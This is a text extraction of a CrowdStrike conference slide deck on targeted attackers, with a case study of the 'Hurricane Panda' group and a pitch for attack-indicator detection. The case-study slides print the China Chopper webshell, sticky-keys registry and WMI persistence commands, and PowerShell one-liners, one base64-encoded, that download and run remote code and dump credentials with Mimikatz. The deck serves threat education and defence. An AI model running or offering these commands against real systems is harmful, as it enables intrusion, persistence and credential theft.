hand-to-hand combat with a targeted attacker€¦ · hand-to-hand combat with a targeted attacker...

HAND-TO-HAND COMBAT WITH A TARGETED ATTACKER

GEORGE KURTZ, CEO & CO-FOUNDER

THE GAP OF SECURITY

A Little About Me…

2014 CrowdStrike, Inc. All rights reserved. 2

GEORGE KURTZ | PRESIDENT/CEO & CO-FOUNDER

CrowdStrike

Serial Entrepreneur Author, entrepreneur, and speaker with 23 years in the security space

Prior to CrowdStrike WW CTO and GM, as well as SVP of Enterprise at McAfee. Founder & CEO of Foundstone (acquired by McAfee in 2004)

www.hackingexposed7.com @George_Kurtz

3

CrowdStrike is a pioneer in next-generation endpoint protection,

threat intelligence, and Pre / Post Response Services

2014 CrowdStrike, Inc. All rights reserved.

WHO IS CROWDSTRIKE?

Trusted by some of the largest blue chip companies and three out

of four of the top government agencies in the world

Lead by security experts and industry veterans with over 200 years of

relevant experience

Founded 2011

AGENDA Current State of In-Security CASE STUDY: Who is Hurricane Panda? Take-aways



69%


200+

Days


$7.6M


$214


40%

Terrorists

Cybercriminals

Commercial Enterprises

Hacktivists/Vigilantes

Nation-States

WHY IS THIS HAPPENING - THE GAP

THREAT SOPHISTICATION

CA

PA

BIL

ITY

FO

R D

AM

AG

E

AB

ILIT

Y T

O P

RE

VE

NT

OPPORTUNISTIC ACTORS

DETERMINED ACTORS

40%

THE

GAP

TODAY’S

HEADLINES

>>

>>

REAL

FINANCIAL

IMPACT OF

IP THEFT

Nearly $1B loss in market cap overnight from a targeted attack!

WHAT ORGANIZATIONS CAN DO TODAY

Destroy & Dump - The New Reality

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.

MAGINOT LINE IS NOT WORKING

16

ENDPOINT

NETWORK

WEB/MAIL

Opportunistic

Opportunistic Targeted

Targeted

DEFENSE

IN DEPTH IS

SILENTLY

FAILING AGAINST

DETERMINED

ADVERSARIES


ORGANIZATIONS

BELIEVE THEY HAVE

A MALWARE PROBLEM


A MALWARE PROBLEM

ORGANIZATIONS

BELIEVE THEY HAVE

AN ADVERSARY PROBLEM



ADVANCED ATTACKERS EVADE traditional defenses and destroy today’s networks


Comment Panda: Commercial, Government, Non-profit

Deep Panda: Financial, Technology, Non-profit

Foxy Panda: Technology & Communications

Anchor Panda: Government organizations, Defense & Aerospace, Industrial Engineering, NGOs

Hurricane Panda: Telecommunications Sector

Impersonating Panda: Financial Sector

Karma Panda: Dissident groups

Keyhole Panda: Electronics & Communications

Poisonous Panda: Energy Technology, G20, NGOs, Dissident Groups

Putter Panda: Governmental & Military

Toxic Panda: Dissident Groups

Union Panda: Industrial companies

Vixen Panda: Government

CHINA

IRAN

INDIA

Viceroy Tiger: Government, Legal, Financial, Media, Telecom

RUSSIA

Energetic Bear: Oil and Gas Companies

NORTH KOREA

Silent Chollima: Government, Military, Financial

Magic Kitten: Dissidents

Cutting Kitten: Energy Companies

Singing Spider: Commercial, Financial

Union Spider: Manufacturing

Andromeda Spider: Numerous

CRIMINAL

Deadeye Jackal: Commercial, Financial,

Media, Social Networking

Ghost Jackal: Commercial, Energy,

Financial

Corsair Jackal: Commercial, Technology,

Financial, Energy

Extreme Jackal: Military, Government

HACKTIVIST/TERRORIST

Understanding the “Who” behind these attacks


WHEN PANDAS ATTACK… MALWARE FREE INTRUSIONS


WHO IS HURRICANE

PANDA?

Operational Window: Late 2013 – Present

Targeting: Telecommunications & Technology

Objectives: Recon, Lateral Movement, IP Theft

Locations: United States, Japan

Tools: Chopper Webshell, PlugX, HiKit

Capabilities:

Theft of Signing Certificates: Used to sign malware to help

evade detection

Remote Access Tools: Use of malware and webshells for

remote access

Escalation: Privileges and lateral movement with credential

dumping tools

Exfil: Usage of FTP to send data out of an organization


THE ATTACK…


ADVERSARY ACTIVITIES

REMAINED UNDETECTED

FOR OVER ONE YEAR.


Chopper webshell:

<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

GAIN ACCESS

MAINTAIN PERSISTENCE

DUMP CREDENTIALS

SECURITY CHALLENGE: DETECTING & STOPPING A 72 BYTE BACKDOOR

WRITTEN TO A WEBSERVER USING AN ARBITRARY FILE

WRITE


Registry command for the debugger hack (if done locally): reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ

/d "cmd.exe" /f

Registry command for the debugger hack (if done remotely using WMI): wmic /user:<REDACTED> /password:<REDACTED> /node:<REDACTED> process call create "C:\Windows\system32\reg.exe add

\"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d

\"cmd.exe\" /f"

GAIN ACCESS


DUMP CREDENTIALS

SECURITY CHALLENGE: DETECTING PERSISTENCE THAT DOESN’T RELY ON A

BINARY EXECUTABLE & BYPASSES THE LOGIN

PROCESS 2015 CrowdStrike, Inc. All rights reserved. 26

STICKY KEYS IN ACTION


BEFORE

LOGGING IN THE ATTACKER

HAS FULL SYSTEM

PRIVILEGES WITH

A COMMAND

PROMPT WINDOW


Using base64 Encoded Commands into Powershell:

GAIN ACCESS


DUMP CREDENTIALS

powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand

DQAKAA0ACgBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMA

dAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4A

ZwAoACcAaAB0AHQAcAA6AC8ALwBpAHMALgBnAGQALwBvAGUAbwBGAHUASQAnACkAOwAgAEkAbgB2AG8A

awBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAiACAAPgAgAEMAOgBcAHUA

cwBlAHIAcwBcAGEALgB0AHgAdAANAAoAIAAgACAAIAANAAoA

SECURITY CHALLENGE: DETECTING PRIVILEGE ESCALATION & LATERAL

MOVEMENT THAT RELIES ON MEMORY-BACKED FILES

Real commands evading traditional defenses:

powershell "IEX (New-Object

Net.WebClient).DownloadString('http://<REDACTED>'); Invoke-Mimikatz

-DumpCreds" > C:\users\a.txt


INDICATORS OF COMPROMISE VS. INDICATORS OF ATTACK -

TRANSFORMATIONAL


Need to look out the windshield

– not drive in the rear view mirror

REACTIVE INDICATORS

OF COMPROMISE

VS

PROACTIVE

INDICATORS OF

ATTACK

IOCs

Malware, Signatures,

Exploits,

Vulnerabilities,

IP Addresses

IOAs

Code Execution,

Persistence, Stealth,

Command & Control,

Lateral Movement


SECURITY

TEAMS

MUST ADJUST

& GO REAL-

TIME

New Detection Methods:

• Must be real-time or rear real-time

• Sweeping just for IOCs is a losing

proposition

• Must detect credential theft as it

happens

• Manage privilege accounts

• 24x7 Managed Services to aid in

detection & containment

REMEMBER: What happens in a virtual container is NOT what happens on your endpoints

“if you no longer go for a

gap that exists, you are no

longer a racing driver

because we are competing, we

are competing to win”

AYRTON Senna – F1 Driver & Champion


“if you no longer go for a

gap that exists in your

victim, you are no longer a

true adversary”

-Bad guy inc.-

Questions?

[email protected]

hand-to-hand combat with a targeted attacker€¦ · hand-to-hand combat with a targeted attacker...

Documents